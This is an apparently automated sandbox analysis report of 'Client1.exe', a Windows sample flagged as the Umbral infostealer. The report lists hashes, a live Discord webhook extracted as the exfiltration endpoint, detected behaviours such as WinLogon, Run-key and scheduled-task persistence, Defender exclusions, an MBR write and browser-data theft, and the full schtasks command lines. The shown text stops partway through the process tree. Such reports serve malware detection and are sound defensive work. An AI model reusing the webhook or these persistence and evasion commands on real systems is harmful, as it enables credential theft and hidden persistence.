Analysis
-
max time kernel
644s -
max time network
646s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
27-05-2024 12:34
Static task
static1
Errors
General
-
Target
Client1.exe
-
Size
747KB
-
MD5
c8d8bf0cef0eb986664a7653b30062b6
-
SHA1
da1957c3bcd76a71d8182fd42a677e5aeaf76cde
-
SHA256
e3b98f944dd0cf41f0955cbc2b8858d249a39f69568ea82286d14e20d8e9c910
-
SHA512
34278aee895a03cd76b56278c5b362aa013d83f8be355fd5fdac442e19eaf5a60477f317cdeac157ba69785661866ff41d6051c1cb40ecb473c2814c5d0c672a
-
SSDEEP
12288:+cWW/gSKBvPVle8c6bn3VG0jMRxPjT90n/4mhBE:+CNEVXePjT90ww
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1243097311723393148/0kJSMmx_-19_4524KFq8Hz7UKUelS_Uh7rQ6mExsss1TqjKf8JjJJVNCnPnFTM52o-iH
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0005000000000733-1249.dat family_umbral behavioral1/memory/3464-1253-0x000001AA875E0000-0x000001AA87628000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\Documents\\Microsoft Project.exe" Client1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ov5u5ysv.lnq.exe" ov5u5ysv.lnq.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2816 powershell.exe 3880 powershell.exe 4416 powershell.exe 1316 powershell.exe 4736 powershell.exe 2664 powershell.exe 3944 powershell.exe -
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" Client1.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cusvtnlp.1l2.exe -
Modifies AppInit DLL entries 2 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation br3bbgzw.z3f.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Sage CRM.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Sage CRM.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Client1.exe -
Executes dropped EXE 8 IoCs
pid Process 3452 br3bbgzw.z3f.exe 3464 cusvtnlp.1l2.exe 4944 Sage CRM.exe 1616 ejqcuqc5.3cz.exe 2728 Microsoft Project.exe 2664 ov5u5ysv.lnq.exe 3700 Sage CRM.exe 2720 Microsoft Project.exe -
Loads dropped DLL 64 IoCs
pid Process 4208 Process not Found 644 Process not Found 4808 Process not Found 1660 Process not Found 4028 WmiApSrv.exe 3428 Process not Found 2388 Process not Found 2884 Process not Found 2816 Process not Found 4232 Process not Found 2644 Process not Found 1192 Process not Found 4884 Process not Found 440 Process not Found 1316 Process not Found 2108 Process not Found 4308 Process not Found 5032 Process not Found 3128 Process not Found 3656 Process not Found 4968 Process not Found 2816 Process not Found 1244 Process not Found 3068 Process not Found 1192 Process not Found 1488 Process not Found 4516 Process not Found 3664 Process not Found 4828 Process not Found 1044 Process not Found 4236 Process not Found 4308 Process not Found 1692 Process not Found 2664 powershell.exe 1204 AUDIODG.EXE 2016 Process not Found 4828 Process not Found 4772 Process not Found 1684 Process not Found 4072 Process not Found 988 Process not Found 752 Process not Found 2312 Process not Found 5056 Process not Found 736 Process not Found 3944 powershell.exe 3464 cusvtnlp.1l2.exe 1228 Process not Found 3356 Process not Found 4584 wmic.exe 2948 Process not Found 2148 Process not Found 4208 Process not Found 2816 powershell.exe 2436 Process not Found 3160 powershell.exe 1836 Process not Found 4972 powershell.exe 1688 Process not Found 2748 powershell.exe 4068 Process not Found 8 wmic.exe 4640 Process not Found 3900 wmic.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update_Pro = "C:\\Users\\Public\\Documents\\Sage CRM.exe" Client1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\userini = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ov5u5ysv.lnq.exe" ov5u5ysv.lnq.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: WScript.exe File opened (read-only) \??\O: WScript.exe File opened (read-only) \??\V: WScript.exe File opened (read-only) \??\X: WScript.exe File opened (read-only) \??\E: WScript.exe File opened (read-only) \??\G: WScript.exe File opened (read-only) \??\I: WScript.exe File opened (read-only) \??\P: WScript.exe File opened (read-only) \??\T: WScript.exe File opened (read-only) \??\W: WScript.exe File opened (read-only) \??\K: WScript.exe File opened (read-only) \??\L: WScript.exe File opened (read-only) \??\M: WScript.exe File opened (read-only) \??\Q: WScript.exe File opened (read-only) \??\S: WScript.exe File opened (read-only) \??\Y: WScript.exe File opened (read-only) \??\N: WScript.exe File opened (read-only) \??\R: WScript.exe File opened (read-only) \??\U: WScript.exe File opened (read-only) \??\Z: WScript.exe File opened (read-only) \??\A: WScript.exe File opened (read-only) \??\B: WScript.exe File opened (read-only) \??\H: WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 58 discord.com 59 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 54 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 ov5u5ysv.lnq.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\xdwd.dll Client1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3112 schtasks.exe 4924 schtasks.exe 2956 schtasks.exe 4236 schtasks.exe 4032 schtasks.exe 4408 schtasks.exe 1124 schtasks.exe 1416 schtasks.exe 3040 schtasks.exe 212 schtasks.exe 1528 schtasks.exe 1664 schtasks.exe 4696 schtasks.exe 4600 schtasks.exe 1712 schtasks.exe 412 schtasks.exe 2284 schtasks.exe 1968 schtasks.exe 3496 schtasks.exe 848 schtasks.exe 2088 schtasks.exe 672 schtasks.exe 1484 schtasks.exe 1116 schtasks.exe 4816 schtasks.exe 3948 schtasks.exe 4924 schtasks.exe 4284 schtasks.exe 2476 schtasks.exe 2636 schtasks.exe 1868 schtasks.exe 780 schtasks.exe 3960 schtasks.exe 3844 schtasks.exe 4468 schtasks.exe 1812 schtasks.exe 836 schtasks.exe 4780 schtasks.exe 1352 schtasks.exe 1544 schtasks.exe 764 schtasks.exe 4724 schtasks.exe 3700 schtasks.exe 4304 schtasks.exe 2796 schtasks.exe 1848 schtasks.exe 4784 schtasks.exe 1408 schtasks.exe 2160 schtasks.exe 768 schtasks.exe 1876 schtasks.exe 4800 schtasks.exe 3160 schtasks.exe 4068 schtasks.exe 2056 schtasks.exe 816 schtasks.exe 2580 schtasks.exe 3700 schtasks.exe 1360 schtasks.exe 2424 schtasks.exe 3320 schtasks.exe 3880 schtasks.exe 2244 schtasks.exe 4832 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3176 wmic.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 17 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133612870557685872" chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "154" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{A65D2BB0-6526-4A8F-97C2-6D4ED1D4B796} WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Sage CRM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Sage CRM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings br3bbgzw.z3f.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1408 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe 1324 Client1.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1324 Client1.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeShutdownPrivilege 624 WScript.exe Token: SeCreatePagefilePrivilege 624 WScript.exe Token: 33 1204 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1204 AUDIODG.EXE Token: SeShutdownPrivilege 624 WScript.exe Token: SeCreatePagefilePrivilege 624 WScript.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 3464 cusvtnlp.1l2.exe Token: SeIncreaseQuotaPrivilege 4584 wmic.exe Token: SeSecurityPrivilege 4584 wmic.exe Token: SeTakeOwnershipPrivilege 4584 wmic.exe Token: SeLoadDriverPrivilege 4584 wmic.exe Token: SeSystemProfilePrivilege 4584 wmic.exe Token: SeSystemtimePrivilege 4584 wmic.exe Token: SeProfSingleProcessPrivilege 4584 wmic.exe Token: SeIncBasePriorityPrivilege 4584 wmic.exe Token: SeCreatePagefilePrivilege 4584 wmic.exe Token: SeBackupPrivilege 4584 wmic.exe Token: SeRestorePrivilege 4584 wmic.exe Token: SeShutdownPrivilege 4584 wmic.exe Token: SeDebugPrivilege 4584 wmic.exe Token: SeSystemEnvironmentPrivilege 4584 wmic.exe Token: SeRemoteShutdownPrivilege 4584 wmic.exe Token: SeUndockPrivilege 4584 wmic.exe Token: SeManageVolumePrivilege 4584 wmic.exe Token: 33 4584 wmic.exe Token: 34 4584 wmic.exe Token: 35 4584 wmic.exe Token: 36 4584 wmic.exe Token: SeIncreaseQuotaPrivilege 4584 wmic.exe Token: SeSecurityPrivilege 4584 wmic.exe Token: SeTakeOwnershipPrivilege 4584 wmic.exe Token: SeLoadDriverPrivilege 4584 wmic.exe Token: SeSystemProfilePrivilege 4584 wmic.exe Token: SeSystemtimePrivilege 4584 wmic.exe Token: SeProfSingleProcessPrivilege 4584 wmic.exe Token: SeIncBasePriorityPrivilege 4584 wmic.exe Token: SeCreatePagefilePrivilege 4584 wmic.exe Token: SeBackupPrivilege 4584 wmic.exe Token: SeRestorePrivilege 4584 wmic.exe Token: SeShutdownPrivilege 4584 wmic.exe Token: SeDebugPrivilege 4584 wmic.exe Token: SeSystemEnvironmentPrivilege 4584 wmic.exe Token: SeRemoteShutdownPrivilege 4584 wmic.exe Token: SeUndockPrivilege 4584 wmic.exe Token: SeManageVolumePrivilege 4584 wmic.exe Token: 33 4584 wmic.exe Token: 34 4584 wmic.exe Token: 35 4584 wmic.exe Token: 36 4584 wmic.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 3160 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeIncreaseQuotaPrivilege 8 wmic.exe Token: SeSecurityPrivilege 8 wmic.exe Token: SeTakeOwnershipPrivilege 8 wmic.exe Token: SeLoadDriverPrivilege 8 wmic.exe Token: SeSystemProfilePrivilege 8 wmic.exe Token: SeSystemtimePrivilege 8 wmic.exe Token: SeProfSingleProcessPrivilege 8 wmic.exe Token: SeIncBasePriorityPrivilege 8 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 1324 Client1.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe 2664 ov5u5ysv.lnq.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe 4496 chrome.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 916 OpenWith.exe 1592 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1324 wrote to memory of 3176 1324 Client1.exe 93 PID 1324 wrote to memory of 3176 1324 Client1.exe 93 PID 3176 wrote to memory of 5000 3176 CMD.exe 95 PID 3176 wrote to memory of 5000 3176 CMD.exe 95 PID 1324 wrote to memory of 3144 1324 Client1.exe 96 PID 1324 wrote to memory of 3144 1324 Client1.exe 96 PID 3144 wrote to memory of 4816 3144 CMD.exe 98 PID 3144 wrote to memory of 4816 3144 CMD.exe 98 PID 1324 wrote to memory of 4872 1324 Client1.exe 99 PID 1324 wrote to memory of 4872 1324 Client1.exe 99 PID 4872 wrote to memory of 3112 4872 CMD.exe 101 PID 4872 wrote to memory of 3112 4872 CMD.exe 101 PID 1324 wrote to memory of 3080 1324 Client1.exe 102 PID 1324 wrote to memory of 3080 1324 Client1.exe 102 PID 3080 wrote to memory of 4924 3080 CMD.exe 104 PID 3080 wrote to memory of 4924 3080 CMD.exe 104 PID 1324 wrote to memory of 3464 1324 Client1.exe 106 PID 1324 wrote to memory of 3464 1324 Client1.exe 106 PID 3464 wrote to memory of 4252 3464 CMD.exe 108 PID 3464 wrote to memory of 4252 3464 CMD.exe 108 PID 1324 wrote to memory of 4532 1324 Client1.exe 111 PID 1324 wrote to memory of 4532 1324 Client1.exe 111 PID 4532 wrote to memory of 2056 4532 CMD.exe 113 PID 4532 wrote to memory of 2056 4532 CMD.exe 113 PID 1324 wrote to memory of 1004 1324 Client1.exe 114 PID 1324 wrote to memory of 1004 1324 Client1.exe 114 PID 1004 wrote to memory of 4408 1004 CMD.exe 116 PID 1004 wrote to memory of 4408 1004 CMD.exe 116 PID 1324 wrote to memory of 4816 1324 Client1.exe 118 PID 1324 wrote to memory of 4816 1324 Client1.exe 118 PID 4816 wrote to memory of 3836 4816 CMD.exe 120 PID 4816 wrote to memory of 3836 4816 CMD.exe 120 PID 1324 wrote to memory of 3380 1324 Client1.exe 121 PID 1324 wrote to memory of 3380 1324 Client1.exe 121 PID 3380 wrote to memory of 3948 3380 CMD.exe 123 PID 3380 wrote to memory of 3948 3380 CMD.exe 123 PID 1324 wrote to memory of 4892 1324 Client1.exe 124 PID 1324 wrote to memory of 4892 1324 Client1.exe 124 PID 1324 wrote to memory of 1360 1324 Client1.exe 127 PID 1324 wrote to memory of 1360 1324 Client1.exe 127 PID 1360 wrote to memory of 4832 1360 CMD.exe 129 PID 1360 wrote to memory of 4832 1360 CMD.exe 129 PID 1324 wrote to memory of 2392 1324 Client1.exe 130 PID 1324 wrote to memory of 2392 1324 Client1.exe 130 PID 2392 wrote to memory of 3700 2392 CMD.exe 132 PID 2392 wrote to memory of 3700 2392 CMD.exe 132 PID 1324 wrote to memory of 2884 1324 Client1.exe 133 PID 1324 wrote to memory of 2884 1324 Client1.exe 133 PID 2884 wrote to memory of 4708 2884 CMD.exe 135 PID 2884 wrote to memory of 4708 2884 CMD.exe 135 PID 1324 wrote to memory of 1896 1324 Client1.exe 136 PID 1324 wrote to memory of 1896 1324 Client1.exe 136 PID 1896 wrote to memory of 2216 1896 CMD.exe 138 PID 1896 wrote to memory of 2216 1896 CMD.exe 138 PID 1324 wrote to memory of 4648 1324 Client1.exe 139 PID 1324 wrote to memory of 4648 1324 Client1.exe 139 PID 4648 wrote to memory of 4924 4648 CMD.exe 141 PID 4648 wrote to memory of 4924 4648 CMD.exe 141 PID 1324 wrote to memory of 4384 1324 Client1.exe 142 PID 1324 wrote to memory of 4384 1324 Client1.exe 142 PID 4384 wrote to memory of 4304 4384 CMD.exe 144 PID 4384 wrote to memory of 4304 4384 CMD.exe 144 PID 1324 wrote to memory of 4548 1324 Client1.exe 145 PID 1324 wrote to memory of 4548 1324 Client1.exe 145 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 740 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client1.exe"C:\Users\Admin\AppData\Local\Temp\Client1.exe"1⤵
- Modifies WinLogon for persistence
- Disables cmd.exe use via registry modification
- Checks computer location settings
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "LastActivityView" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "LastActivityView" /tr "C:\Users\Admin\Documents\Microsoft Project.exe"3⤵PID:5000
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4816
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive Update" /tr "C:\Users\Public\Documents\Sage CRM.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive Update" /tr "C:\Users\Public\Documents\Sage CRM.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3112
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4924
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4252
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2056
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4408
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3836
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3948
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4892
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4832
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
